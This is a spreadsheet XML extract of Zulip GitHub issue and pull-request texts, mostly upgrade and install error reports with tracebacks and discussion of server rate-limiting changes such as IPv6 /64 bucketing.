    <t>Upgrade from 4.8 to 4.9 failed restarting rabbitmq-server; Hi,. I'm upgrading a Zulip Server 4.8 to the new release 4.9 and I'm getting an error (`ERROR: node with name "zulip" already running on "localhost"`) when the upgrade script try to restart rabbitmq-server (as seen from `/var/log/rabbitmq/startup_log`):. ```. # ~zulip/deployments/current/scripts/upgrade-zulip ~zulip/zulip-server-4.9.tar.gz. [...]. . Zulip stopped successfully! . 2022-01-26 07:17:25,258 upgrade-zulip-stage-2: Generating a secure erlang cookie... Setting a more secure RabbitMQ distribution magic cookie. Job for rabbitmq-server.service failed because the control process exited with error code. See "systemctl status rabbitmq-server.service" and "journalctl -xe" for details. Traceback (most recent call last):. File "/home/zulip/deployments/2022-01-26-08-16-30/scripts/lib/upgrade-zulip-stage-2", line 322, in &lt;module&gt;. subprocess.check_call(["./scripts/setup/generate-rabbitmq-cookie"]). File "/usr/lib/python3.8/subprocess.py", line 364, in check_call. raise CalledProcessError(retcode, cmd). subprocess.CalledProcessError: Command '['./scripts/setup/generate-rabbitmq-cookie']'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 # cat /var/log/rabbitmq/startup_log. ERROR: node with name "zulip" already running on "localhost". ```. After re-running the upgrade script multiple times with the same error, I explicitly restarted the `epmd` daemon (with `systemctl restart epmd`), and the upgrade script finally succeeded on a subsequent run.</t>
  </si>
  <si>
    <t>api_docs: Add page documenting HTTP headers in the api docs.; Adds a page to the general api documentation about HTTP headers, so that information about the response headers for rate limits have a more logical location in the docs, and so that other HTTP header information can be shared, such as `User-Agent` conventions. See [this CZO chat](https://chat.zulip.org/#narrow/stream/378-api-design/topic/error.20docs) for more details about adding this documentation page. Adjusts some text and linking in `templates/zerver/api/rest-error-handling.md` and `templates/zerver/api/rest.md` for the addition of the HTTP headers page. `User-Agent` conventions section to be filled in during merge. **Screenshots of current updates and additions:**. - **New HTTP Headers page**. ![Screenshot from 2022-01-27 13-17-06](https://user-images.githubusercontent.com/63245456/151357332-276a15d5-c248-4ec4-9130-c159dc8d9512.png). - **Changes to Error Handling page**. ![Screenshot from 2022-01-26 16-34-09](https://user-images.githubusercontent.com/63245456/151194894-e8983fc4-d3bf-4d13-a6b8-7d3949706549.png). - **Changes to Overview page of REST API**. ![Screenshot from 2022-01-26 16-34-36](https://user-images.githubusercontent.com/63245456/151194895-cf87eb5b-40a5-430b-b654-63b8db2dfaff.png).</t>
  </si>
  <si>
    <t xml:space="preserve"> "upgrade" from `main` to 4.x should abort; Django does. not prevent running old code against the new database (though it. likely errors at runtime), and `./manage.py migrate` from the old. version during the "upgrade" does not downgrade the database, since. the migrations are entirely missing in that directory, so don't get. reversed. Compare the list of applied migrations to the list of on-disk. migrations, and abort if there are applied migrations which are not. found on disk. Fixes: #19284. **Testing plan:** Cherry-picked to 4.x, tried to "upgrade" from main to 4.x:. ```. root@alexmv-prod:/home/zulip/deployments/next# ~zulip/deployments/current/scripts/upgrade-zulip-from-git --remote-url https://github.com/alexmv/zulip.git 4.x. 2022-02-03 23:16:00,394 upgrade-zulip-from-git: Fetching the latest commits. [...]. Using cached Python venv from /srv/zulip-venv-cache/a7fb0fe17c8b91b591927bfa8f133a90b20f3d18/zulip-py3-venv. + ln -nsf /srv/zulip-venv-cache/a7fb0fe17c8b91b591927bfa8f133a90b20f3d18/zulip-py3-venv /home/zulip/deployments/2022-02-03-23-16-00/zulip-py3-venv. 2022-02-03 23:17:30.125 ERR [] This is not an upgrade -- the current deployment (version 5.0-dev+git) contains 52 database migrations which /home/zulip/deployments/2022-02-03-23-16-00 (version 4.9+git) does not. Traceback (most recent call last):. File "/home/zulip/deployments/2022-02-03-23-16-00/scripts/lib/upgrade-zulip-stage-2", line 206, in &lt;module&gt;. subprocess.check_call(. File "/usr/lib/python3.8/subprocess.py", line 364, in check_call. raise CalledProcessError(retcode, cmd). subprocess.CalledProcessError: Command '['/home/zulip/deployments/2022-02-03-23-16-00/scripts/lib/check-database-compatibility.py']'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</si>
  <si>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compose: Add pending upload count and "Cancel" button to status modal; ## Context. Fixes #21156. - [x] Adds count of pending uploads to the send_status_message modal, improving the UX by making it easier to see if some uploads are taking too long and the number of pending uploads in real time. Uploads can be cancelled with the "close" button which already implemented the cancelling behavior. - [x] Adds a button to cancel uploads, separating the behavior out from the existing `x` button (which unexpectedly implemented this behavior). - [x] Update tests. ## Testing Plan. I tested on my local development environment by throttling my upload speeds and queueing multiple uploads of different sizes. The upload counts indicated in the modal were reliable against the count of placeholders in the compose UI. Clicking the "cancel" button consistently cancelled the uploads and cleared out the placeholders. ## Screenshots. &lt;details&gt;. &lt;summary&gt;Light Mode&lt;/summary&gt;. . ![image](https://user-images.githubusercontent.com/72784348/163379142-6816fb5e-fa65-4de6-970c-4f3602cd7e55.png). &lt;/details&gt;. &lt;details&gt;. &lt;summary&gt;Dark Mode&lt;/summary&gt;. ![image](https://user-images.githubusercontent.com/72784348/163379156-51fba956-10c0-4b0b-aa42-89d68cf479e3.png). &lt;/details&gt;. &lt;!-- Also be sure to make clear, coherent commits:. https://zulip.readthedocs.io/en/latest/contributing/version-control.html. --&gt;.</t>
  </si>
  <si>
    <t>Add self-service UI for single-user exports.; We have a management command invoked via `./manage.py export_single_user` that allows a Zulip sys admin to export all the data for a user. This can be useful in several contexts, such as GDPR requests and HR investigations. For realm exports, we have a UI that allows the admin to do the export from within Zulip, but we don't have it for single-user exports. We should have a similar UI for single user exports. We need to be careful about permissions here. I **think** that any normal user should be allowed to export their own data, but we will want to be thoughtful about logging and possibly throttling those requests. Single-user exports are relatively inexpensive, but we do want to make sure that users don't abuse the feature. For most organizations, there are enough privacy concerns about the data in a single-user export that even a Zulip admin should not be allowed to export any other user's data from the UI. There is no reason to prevent self-hosting Zulip owners from doing this through the UI, since most owners presumably already have access to this data. Also, in certain corporate environments, there probably is already legal infrastructure that allows Zulip admins to view private data. We probably will want some kind of setting here that governs the permissions. If you want to work on this, you don't immediately need to get bogged down into privacy concerns. If we can create a simple prototype for a self-service UI in which users can only export their own data, it should be easy to eventually extend that for the admin use cases.</t>
  </si>
  <si>
    <t>Timeout during connect (likely firewall problem); Use 'apt autoremove' to remove it. 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. + certbot certonly --webroot --webroot-path=/var/lib/zulip/certbot-webroot/ -d slack.demoserver.in -m bablu.kumar@webnyxa.com --force-interactive --no-eff-email. Saving debug log to /var/log/letsencrypt/letsencrypt.log. Plugins selected: Authenticator webroot, Installer None. Obtaining a new certificate. Performing the following challenges:. http-01 challenge for slack.demoserver.in. Using the webroot path /var/lib/zulip/certbot-webroot for all unmatched domains. Waiting for verification... Challenge failed for domain slack.demoserver.in. http-01 challenge for slack.demoserver.in. Cleaning up challenges. Some challenges have failed. IMPORTANT NOTES:. - The following errors were reported by the server:. Domain: slack.demoserver.in. Type: connection. Detail: Fetching. http://slack.demoserver.in/.well-known/acme-challenge/qVEA0pcNZYmBHq0y1T5CEiY1Edjj7tXbKVWyWLCjd2A:. Timeout during connect (likely firewall problem). To fix these errors, please make sure that your domain name was. entered correctly and the DNS A/AAAA record(s) for that domain. contain(s) the right IP address. Additionally, please check that. your computer has a publicly routable IP address and that no. firewalls are preventing the server from communicating with the. client. If you're using the webroot plugin, you should also verify. that you are serving files from the webroot path you provided. Zulip installation failed (exit code 1)! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. please help how to solve .</t>
  </si>
  <si>
    <t>Improve IPv6 rate-limiting by bucketing ; Currently, we limit by single IP address -- even for IPv6 addresses, which people have in huge numbers (generally at least 2^64). This allows them to easily bypass the per-IP-address rate limits by shifting to a new adjacent IPv6 address within their /64. We should shift to bucketing IPv6 addresses by their /64, as a very first limit. We should also impose additional, slightly larger buckets at the /48 and /32 level, which are larger than the /64 but significantly smaller than 2^16 times as large. Hat tip to https://adam-p.ca/blog/2022/02/ipv6-rate-limiting/ for bringing up this type of problem, and the proposed solutions.</t>
  </si>
  <si>
    <t>avatar: Add rate limit similar to attachments on medium avatars.; Followup on #20136.</t>
  </si>
  <si>
    <t xml:space="preserve"> in new version. Migration ('zerver', '0014_realm_emoji_url_length') missing in new version. Migration ('zerver', '0010_delete_streamcolor') missing in new version. Migration ('zerver', '0025_realm_message_content_edit_limit') missing in new version. Migration ('zerver', '0023_userprofile_default_language') missing in new version. Migration ('zerver', '0009_add_missing_migrations') missing in new version. Migration ('zerver', '0013_realmemoji') missing in new version. Migration ('zerver', '0011_remove_guardian') missing in new version. Migration ('zerver', '0015_attachment') missing in new version. Migration ('zerver', '0022_subscription_pin_to_top') missing in new version. Migration ('zerver', '0024_realm_allow_message_editing') missing in new version. Migration ('zerver', '0021_migrate_attachment_data') missing in new version. 2022-03-29 21:02:06.574 ERR [] This is not an upgrade -- the current deployment (version 4.11) contains 28 database migrations which /home/zulip/deployments/2022-03-30-06-01-59 (version 5.0) does not. Traceback (most recent call last):. File "/home/zulip/deployments/2022-03-30-06-01-59/scripts/lib/upgrade-zulip-stage-2", line 222, in &lt;module&gt;. subprocess.check_call(. File "/usr/lib/python3.8/subprocess.py", line 364, in check_call. raise CalledProcessError(retcode, cmd). subprocess.CalledProcessError: Command '['/home/zulip/deployments/2022-03-30-06-01-59/scripts/lib/check-database-compatibility.py']'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This deployment is migrated from Zulip 1.X, 2.X, ... to 4.X. This may be related to https://github.com/zulip/zulip/commit/6fbddf578a6e99f97aabb420a570f048e38a24f4 migration squash. We may need something like https://github.com/zulip/zulip/pull/21277 .</t>
  </si>
  <si>
    <t>rate_limit: Remove rate_limit.; By using inlined calls to rate limit functions like `rate_limit_request_by_ip` in the corresponding view decorators,. we can remove the all-in-one `rate_limit` function. As a part of this change, `rate_limit_by_remote_server` is now an internal part of `zilencer`, such that `zerver.lib.rate_limiter`. no longer depends on it. Inlining the rate limit checks also leads to a complete rework of the `RateLimitTestCase`.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discipline](https://zulip.readthedocs.io/en/latest/contributing/version-control.html)).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</si>
  <si>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exponential backoff</t>
  </si>
  <si>
    <t>Narrow retries; Fix retries for matches_narrow re-checks, and switch messages retries to exponential backoff with jitter. Fixes: #20165.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</si>
  <si>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2fa7c8bd0a48e9970619d/zulip-py3-venv/bin/virtualenv-clone /srv/zulip-venv-cache/e5128e116bae759c7692fa7c8bd0a48e9970619d/zulip-py3-venv /srv/zulip-venv-cache/b8945e1cc0e5b3384781c3b299daf524b3c57441/zulip-py3-venv. Traceback (most recent call last):. File "/srv/zulip-venv-cache/e5128e116bae759c7692fa7c8bd0a48e9970619d/zulip-py3-venv/bin/virtualenv-clone", line 5, in &lt;module&gt;. from clonevirtualenv import main. ModuleNotFoundError: No module named 'clonevirtualenv'. Error running a subcommand of /tmp/tmp.UI0ell14bO/zulip-server-5.6/scripts/lib/create-production-venv: /srv/zulip-venv-cache/e5128e116bae759c7692fa7c8bd0a48e9970619d/zulip-py3-venv/bin/virtualenv-clone /srv/zulip-venv-cache/e5128e116bae759c7692fa7c8bd0a48e9970619d/zulip-py3-venv /srv/zulip-venv-cache/b8945e1cc0e5b3384781c3b299daf524b3c57441/zulip-py3-venv . Actual error output for the subcommand is just above this. Zulip installation failed (exit code 1)! . . The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log . ```. 4GB RAM Linode. Ubuntu 22.04.1 LTS. Edit: Re-running ./zulip-server-*/scripts/setup/install --certbot --email=YOUR_EMAIL --hostname=YOUR_HOSTNAME, results in . ```. The following PostgreSQL servers were found to already be installed:. postgresql-15. Zulip needs to install PostgreSQL 14, but does not wish. to uninstall existing databases in order to do so. Remove all other. PostgreSQL servers manually before running the installer:. sudo apt-get remove postgresql-15. + exit 1. Zulip installation failed (exit code 1)! . . The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log . ```. Edit2: And re-running the installer again, shows the same error: . ```. [...]. T</t>
  </si>
  <si>
    <t>Resuming from suspend causes client to be rate limited; When a client resumes from sleep, it can spam presence, which will lead the client to displaying an error message:. ![RateLimit Error](https://user-images.githubusercontent.com/195072/199838908-3f1f0fe9-09eb-4e66-b96b-0d1084caf7dc.png). Server log (including when the client originally slept):. [server.log](https://github.com/zulip/zulip/files/9933169/server.log).</t>
  </si>
  <si>
    <t>Shift left sidebar correctly when following a link to an inactive stream; Reproducer: Click on an inactive stream in the left sidebar. Expected: The stream should be centered in the left sidebar. Actual: *First* the sidebar jumps to the stream, and *next* the stream move to the "Active" section (because the user just clicked on it). As a result, the stream may end up outside of the left sidebar view altogether. Tips for reproducing the bug:. * Have a lot of streams (`./manage.py populate_db --extra-streams=100`). * Use `Slow 3G` network throttling. We should change the order of events, so that the view jumps to the stream only after it has been moved to the "Active" section.</t>
  </si>
  <si>
    <t>api: Link to new rate-limiting configuration documentation.; From https://github.com/zulip/zulip/pull/22956#issuecomment-1306091433:. &gt; I added a link to the /api/ documentation page on rate limiting error codes; we probably want to cross-link that, but might be easiest to do that in a follow-up PR, because CI will fail if we try to add links to a page that doesn't exist on ReadTheDocs yet. This is that follow-up.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[x]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</si>
  <si>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Add comments explaining each rate limiting rule; This avoid the need for spelunking the code to figure out the details of how/when the rule is applied.</t>
  </si>
  <si>
    <t>rate Limit</t>
  </si>
  <si>
    <t>ge; Completes 2 of the tasks in #3128. - [x] You shouldn't be able to click "Find team" if you don't have a valid list of email addresses. Slack does this really nicely: https://slack.com/signin/find. - [ ] We should send an email regardless of whether they are in a Zulip org or not. - [ ] The follow-up page should have links to resend the email or enter a different email address. - [x] The URL of the follow-up page currently has the email as a URL parameter, which should be removed. We chose to complete subtasks 1 &amp; 4. We believe that subtask 2 is a design choice and should be carefully discussed with other developers. We believe that subtask 3 is not necessary if we validate the emails in subtask 1. These two can be discussed and completed at a later date. . Screenshots: . Task 1: If the User enters an invalid email, the button will become greyed out and unclickable. A warning message will also appear below the field. . &lt;img width="638" alt="206793860-c5801b31-84f5-416e-abf9-3bd774572894" src="https://user-images.githubusercontent.com/84806182/206808426-640e0f10-6c28-4507-b7c6-53d00da346cb.png"&gt;. If the email is valid, the button becomes clickable: . &lt;img width="652" alt="206800148-4b466770-07a2-4e2d-b30e-2e1556573cf1" src="https://user-images.githubusercontent.com/84806182/206808860-b76fd318-1259-4c44-9a6d-7451a471534f.png"&gt;. Task 4: If we enter a valid email address, we are taken to the follow-up page. We can now see that the email address is no longer displayed in the URL. . ![206799296-40af9c26-dcac-44dd-839c-a681548ad034 (1)](https://user-images.githubusercontent.com/84806182/206809427-527d681f-4a0d-4724-a3a5-1e4689ecc046.jpeg). Implementation Process Hurdles: . - Unit tests had to be modified/removed due to the changing front-end and URL-handling. - The rate Limit for the Find My Teams Page seems to be very low. During manual testing, we noticed that Zulip blocks any additional requests after ~5 test submits. This may be something to look at in the future. .</t>
  </si>
  <si>
    <t>email_log: Override rate limit rules to resolve AssertionErrors.; &lt;!-- Describe your pull request here.--&gt;. Fixes a regression introduced in 0cfb156545 and [reported by @alya today](https://chat.zulip.org/#narrow/stream/49-development-help/topic/error.20generating.20emails/near/1496308) where `/emails/generate` throws an `AssertionError` in Vagrant environments due to the Django test client being rate limited on three domains. Dev environments are meant to be exempt from such rate limiting, but due to REMOTE_ADDR being something other than 127.0.0.1 or ::1 in these environments, they are not. This endpoint is a bit special in how many rules it needs to break, and so rather than casting a wide net trying to hack 172.17.0.0 address spaces (and who knows how many others) into being considered local, with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t>
  </si>
  <si>
    <t>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with `@rate_limit_rule` here.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t>
  </si>
  <si>
    <t xml:space="preserve">email_log: Resolve AssertionErrors by handling all sub-requests as properly internal.; This is a second take on fixing the concerns that led to #24176.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 &gt; Aside: a third option for fixing this issue, albeit more invasive, would be to entirely refactor this endpoint to call the inner behaviors of the endpoints directly, without making partially-fake HTTP requests and going through all the middlewares and auth stack and etc., however I suspect that's a fairly non-trivial option due to how much code is involved. Where #24176 changed the global rate limiting rules for this endpoint similarly to how our unit tests do to force success, this PR fixes the "am I a dev environment?" detection in several pieces, described below:. - eb9d70f498: This is a quick fix to a case that comes up once the later commits are applied: that POSTing an endpoint with `client=internal` in the body will result in a populated `RequestNotes.client_name`, but not always a populated `RequestNotes.client`. Further, in certain cases, we can end up with a `RequestNotes.client` and a **differing** `RequestNotes.client_name`, where the latter is pulled from the PATCH/POST body and should be preferred (since, as we'll see later, we're explicitly opting in to being `internal`). - eed5c0b9d6: This fixes bugs where rate limiting was applied without regard to exemptions, providing no break-glass for cases such as this `/emails/generate` endpoint. - 5086d84b8b: A commit that's definitely </t>
  </si>
  <si>
    <t>Spam &amp; Rate Limit Related Issue; We created an invite link and shared it to a few people over a public group call. . One of the recipients has been spamming and this has resulted in no newly generated links working either - Rate Limit Exceeded. Logs:. `email_deliverer.log`. ```. 2023-01-31 18:45:54,565 WARNING &lt;ScheduledEmail: &lt;ScheduledEmail: 1 [&lt;UserProfile: &lt;UserProfile: user17@zulip.bitshala.org &lt;Realm: 2&gt;&gt;&gt;] 2023-01-29 18:30:13.454766+00:00&gt;&gt; not delivered. 2023-01-31 18:45:54,806 WARNING &lt;ScheduledEmail: &lt;ScheduledEmail: 1 [&lt;UserProfile: &lt;UserProfile: user17@zulip.bitshala.org &lt;Realm: 2&gt;&gt;&gt;] 2023-01-29 18:30:13.454766+00:00&gt;&gt; not delivered. 2023-01-31 18:45:55,060 WARNING &lt;ScheduledEmail: &lt;ScheduledEmail: 1 [&lt;UserProfile: &lt;UserProfile: user17@zulip.bitshala.org &lt;Realm: 2&gt;&gt;&gt;] 2023-01-29 18:30:13.454766+00:00&gt;&gt; not delivered. 2023-01-31 18:45:55,309 WARNING &lt;ScheduledEmail: &lt;ScheduledEmail: 1 [&lt;UserProfile: &lt;UserProfile: user17@zulip.bitshala.org &lt;Realm: 2&gt;&gt;&gt;] 2023-01-29 18:30:13.454766+00:00&gt;&gt; not delivered. 2023-01-31 18:45:55,555 WARNING &lt;ScheduledEmail: &lt;ScheduledEmail: 1 [&lt;UserProfile: &lt;UserProfile: user17@zulip.bitshala.org &lt;Realm: 2&gt;&gt;&gt;] 2023-01-29 18:30:13.454766+00:00&gt;&gt; not delivered. 2023-01-31 18:45:55,811 WARNING &lt;ScheduledEmail: &lt;ScheduledEmail: 1 [&lt;UserProfile: &lt;UserProfile: user17@zulip.bitshala.org &lt;Realm: 2&gt;&gt;&gt;] 2023-01-29 18:30:13.454766+00:00&gt;&gt; not delivered. 2023-01-31 18:45:56,065 WARNING &lt;ScheduledEmail: &lt;ScheduledEmail: 1 [&lt;UserProfile: &lt;UserProfile: user17@zulip.bitshala.org &lt;Realm: 2&gt;&gt;&gt;] 2023-01-29 18:30:13.454766+00:00&gt;&gt; not delivered. 2023-01-31 18:45:56,312 WARNING &lt;ScheduledEmail: &lt;ScheduledEmail: 1 [&lt;UserProfile: &lt;UserProfile: user17@zulip.bitshala.org &lt;Realm: 2&gt;&gt;&gt;] 2023-01-29 18:30:13.454766+00:00&gt;&gt; not delivered. 2023-01-31 18:45:56,559 WARNING &lt;ScheduledEmail: &lt;ScheduledEmail: 1 [&lt;UserProfile: &lt;UserProfile: user17@zulip.bitshala.org &lt;Realm: 2&gt;&gt;&gt;] 2023-01-29 18:30:13.454766+00:00&gt;&gt; not delivered. 2023-01-31 18:45:56,810 WARNING &lt;Sche</t>
  </si>
  <si>
    <t>on_string` function in `scripts/lib/upgrade-zulip-stage-2`, line 467. Output error : . ```bash. [...]. fatal: ambiguous argument '6.1+git': unknown revision or path not in the working tree. Use '--' to separate paths from revisions, like this:. 'git &lt;command&gt; [&lt;revision&gt;...] -- [&lt;file&gt;...]'. Traceback (most recent call last):. File "/home/zulip/deployments/2023-04-11-15-34-29/scripts/lib/upgrade-zulip-stage-2", line 496, in &lt;module&gt;. run_hooks("pre-deploy"). File "/home/zulip/deployments/2023-04-11-15-34-29/scripts/lib/upgrade-zulip-stage-2", line 475, in run_hooks. env["ZULIP_OLD_COMMIT"] = resolve_version_string(old_version). File "/home/zulip/deployments/2023-04-11-15-34-29/scripts/lib/upgrade-zulip-stage-2", line 467, in resolve_version_string. return subprocess.check_output(. File "/usr/lib/python3.9/subprocess.py", line 424, in check_output. return run(*popenargs, stdout=PIPE, timeout=timeout, check=True,. File "/usr/lib/python3.9/subprocess.py", line 528, in run. raise CalledProcessError(retcode, process.args,. subprocess.CalledProcessError: Command '['git', 'rev-parse', '6.1+git']' returned non-zero exit status 128. Zulip upgrade failed (exit code 1)! The upgrade process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/upgrade.log. ```. Git tries to run `git rev-parse 6.1+git`, which is not correct. # To reproduce : . Env : Clean Debian 11 with backports. 1. Install with (branch 6.x) : . ```bash. git clone https://github.com/zulip/zulip.git zulip-server-git -b 6.x. ./zulip-server-*/scripts/setup/install --self-signed-cert --email=zulip@domain.tld --hostname=zulip.domain.tld. ```. (In my case, I use `--no-init-db` and manually install database with my own credentials). 2. Upgrade to main : . ```bash. /home/zulip/deployments/current/scripts/upgrade-zulip-from-git main. ```. Thanks for your help and sorry for my English!</t>
  </si>
  <si>
    <t>No such file or directory: './scripts/lib/update-git-upstream'; Hi,. I've been running the latest git version of zulip for years now but suddenly I see the following error message when running `/home/zulip/deployments/current/scripts/upgrade-zulip-from-git main`. ```. Traceback (most recent call last):. File "/home/zulip/deployments/current/scripts/lib/upgrade-zulip-from-git", line 136, in &lt;module&gt;. subprocess.check_call(["./scripts/lib/update-git-upstream"], preexec_fn=su_to_zulip). File "/usr/lib/python3.10/subprocess.py", line 364, in check_call. retcode = call(*popenargs, **kwargs). File "/usr/lib/python3.10/subprocess.py", line 345, in call. with Popen(*popenargs, **kwargs) as p:. File "/usr/lib/python3.10/subprocess.py", line 969, in __init__. self._execute_child(args, executable, preexec_fn, close_fds,. File "/usr/lib/python3.10/subprocess.py", line 1845, in _execute_child. raise child_exception_type(errno_num, err_msg, err_filename). FileNotFoundError: [Errno 2] No such file or directory: './scripts/lib/update-git-upstream'. Zulip upgrade failed (exit code 1)! The upgrade process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/upgrade.log. ```. what's going on here?</t>
  </si>
  <si>
    <t>loading: Show error when spectator fails to register.; Fixes #25683. I tested that both reload links work -- they're just quite slow when local throttling is on.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![Kapture 2023-06-25 at 16 11 11](https://github.com/zulip/zulip/assets/5634097/9f885df9-a73c-45c0-b84c-9b8cdc9c7d7c).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[x] Visual appearance of the changes. - [x] Responsiveness and internationalization. - [x] Strings and tooltips. - [x] End-to-end functionality of buttons, interactions and fl</t>
  </si>
  <si>
    <t>server push</t>
  </si>
  <si>
    <t>zilencer: Handle very old server push notifications.;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</si>
  <si>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Generating all emails does not work in dev environment; &lt;!-- Describe what you were expecting to see, what you saw instead, and steps to take in order to reproduce the buggy behavior. Screenshots can be helpful. --&gt;. From the description for #24231 (PR, needs work):. &gt;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t>
  </si>
  <si>
    <t>Dialog widget cancel button doesn't look disabled when it should be; &lt;!-- Issue description --&gt;. The **"Cancel"** button of dialog widget gets functionally disabled whenever the changes are saved, but in light theme, it doesn't look disabled visually when it should be, it is probably a CSS styling bug. While reproducing, turn on **throttling** from the `devtools` **network tab**, since it might be difficult to spot it because the dialog box closes quickly. Steps to reproduce :-. 1. Switch to light theme. 2. Open the move message dialog and move a message to other stream/topic keeping an eye on the cancel button. 3. Click the move message button. 4. Cancel button appears to be not disabled (although it isn't). &lt;!-- Link to a message in the chat.zulip.org discussion. Message links will still work even if the topic is renamed or resolved. Link back to this issue from the chat.zulip.org thread. --&gt;. [CZO thread](https://chat.zulip.org/#narrow/stream/9-issues/topic/Dialog.20widget.20cancel.20button.20doesn't.20look.20disabled.2E/near/1729707). &lt;img width="700" src="https://github.com/zulip/zulip/assets/11803841/2f78e3fb-edbb-4b8a-ab9d-906c2bc20be8"&gt;.</t>
  </si>
  <si>
    <t>Respect our rate limit headers in the web application; I noticed while debugging something that the Zulip web application doesn't respect the rate-limiting headers in its main `channel.js` library. There is a block of code in `unread_ops.js` that parses those responses:. ```. } else if (xhr.responseJSON?.code === "RATE_LIMIT_HIT") { . // If we hit the rate limit, just continue without showing any error. . const milliseconds_to_wait = 1000 * xhr.responseJSON["retry-after"]; . setTimeout( . () =&gt; bulk_update_read_flags_for_narrow(narrow, op, args), . milliseconds_to_wait, . ); . ```. and actually waits the appropriate period before retrying. Notably, it doesn't check the `429` status code; I'm not sure that's a bad thing. I believe repeating the request after the requested period is probably the correct behavior for a client in most situations. I'm not sure if we want `channel.js` to do that without a specific parameter requesting retries; while retrying is potentially correct failure recovery logic, it may or may not be a good idea given that probably something is quite wrong with a client that is seeing 429s for requests that we don't expect clients to hit heavily. Our really key code paths, like fetching messages or events, do exponential backoff for any failures that they might retry on. We likely want to preserve that behavior -- if the server is 500ing or 502ing due to load, we want to break clients hammering on it even though the server is not returning 429s. We need to be careful to make sure we don't lose the failure-counting logic those have in addressing this. Tagging as difficult because I'm not sure how we want this to work and it also will require some manual testing care.</t>
  </si>
  <si>
    <t>Fix rate limiting issues with the web application; Based on an investigation of a case where the web app managed to hit server-side rate limits. The individual commits detail the changes.</t>
  </si>
  <si>
    <t>pre-rendered-message</t>
  </si>
  <si>
    <t>bootstrap: Remove pre styles.; Happily, every last CSS property in these styles is already described for the places `&lt;pre&gt;` appears in the Zulip UI:. 1. In rendered message markdown. 2. In the compose preview. 3. In the information overlay (Message formatting). &lt;!-- Describe your pull request here.--&gt;. Fixes: &lt;!-- Issue link, or clear description.--&gt;. &lt;!-- If the PR makes UI changes, always include one or more still screenshots to demonstrate your changes. If it seems helpful, add a screen capture of the new functionality as well. Tooling tips: https://zulip.readthedocs.io/en/latest/tutorials/screenshot-and-gif-software.html. --&gt;. **Devtools inspections of the three `&lt;pre&gt;` occurrences**. In rendered messages:. ![pre-rendered-message](https://github.com/zulip/zulip/assets/170719/0a601b0e-e744-4cc3-86e0-234760307c98). In message previews:. ![pre-compose-box-preview](https://github.com/zulip/zulip/assets/170719/ef68d8a2-4b92-4a82-a906-866640bf4489). In the Message formatting overlay:. ![pre-info-overlay](https://github.com/zulip/zulip/assets/170719/e41b6baf-40dd-475e-b1d7-3f480c5ed8ab).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t>
  </si>
  <si>
    <t>push-bouncer: Exclude LoggingCountStats with partial data.; `LoggingCountStat`s with a daily duration and that are directly stored on the `RealmCount` table (not via aggregation in `process_count_stat`), can be in a state, after the hourly cron job to update analytics counts, where the logged value will be live-updated later, because the end time for the stat is still in the future. As these logging counts are designed to be used on the self-hosted installation for either debugging or rate limiting, sending these partial/incomplete counts to the bouncer has low value.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t>
  </si>
  <si>
    <t>ERROR: relation "zulip.zerver_message" does not exist; Using this manual. https://zulip.readthedocs.io/en/stable/production/install.html. after running . ```. ./zulip-server-*/scripts/setup/install --certbot --[email=emoxam@example.com](mailto:email=emoxam@example.com) --hostname=domain.example.com. ```. i get error. ```. + POSTGRES_USER=postgres. ++ crudini --get /etc/zulip/zulip.conf postgresql database_name. ++ echo zulip. + DATABASE_NAME=zulip. ++ crudini --get /etc/zulip/zulip.conf postgresql database_user. ++ echo zulip. + DATABASE_USER=zulip. ++ su postgres -c 'cd / &amp;&amp; psql -v ON_ERROR_STOP=1 -Atc "SELECT 1 FROM pg_database WHERE datname='\''zulip'\'';"'. + '[' 1 = 1 ']'. ++ su postgres -c 'cd / &amp;&amp; psql -v ON_ERROR_STOP=1 -Atc '\''SELECT COUNT(*) FROM zulip.zerver_message;'\'' zulip'. ERROR: relation "zulip.zerver_message" does not exist. LINE 1: SELECT COUNT(*) FROM zulip.zerver_message;. ^. + records=. Zulip installation failed (exit code 1)! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log`</t>
  </si>
  <si>
    <t>installation problem; &lt;!-- Describe what you were expecting to see, what you saw instead, and steps to take in order to reproduce the buggy behavior. Screenshots can be helpful. --&gt;. Hello! When installing the server, the following error appears:. &lt;!-- Check the box for the version of Zulip you are using (see https://zulip.com/help/view-zulip-version).--&gt;. Database created. + su zulip -c '/home/zulip/deployments/current/scripts/setup/initialize-database --quiet'. +++ readlink -f /home/zulip/deployments/current/scripts/setup/initialize-database. ++ dirname /home/zulip/deployments/2024-06-07-16-37-39/scripts/setup/initialize-database. + THIS_DIR=/home/zulip/deployments/2024-06-07-16-37-39/scripts/setup. + cd /home/zulip/deployments/2024-06-07-16-37-39/scripts/setup/../.. + ./manage.py checkconfig. /home/zulip/deployments/current/scripts/setup/initialize-database: line 36: 16363 Illegal instruction ./manage.py checkconfig. Zulip installation failed (exit code 132)! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. root@debian:/tmp/tmp.ITovLKQMzp# . How to solve this problem? Installation is performed on a freshly installed Debian 12.</t>
  </si>
  <si>
    <t>Rate limit IPv6 by /64 instead of single addresses; Fixes #21544. - Rate limits IPV6 by `/64`. - This imposes a bucket for each `/64`. - The network prefix (e.g. `/64`) indicates the network portion of the IPv6, that network portion is used as the bucket key. ## Diagram for reference. ![ipv6-rate-limiting](https://github.com/user-attachments/assets/f751a06c-48fa-40ea-a3ba-40ffab5cf69e).</t>
  </si>
  <si>
    <t>help: Suggest invitation link for Cloud email invite rate limit.; Follow-up from #30767:. &gt; It might be a good idea to mention generating an invitation link and sending the email yourself as a workaround here; it might save some stress and support tickets for people where that workaround is totally sufficient for their needs. **Screenshots and screen captures:**. ![Screenshot from 2024-07-11 23-11-26](https://github.com/user-attachments/assets/14d290f9-18c6-4c2f-abf4-18e45cb1baf9).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</si>
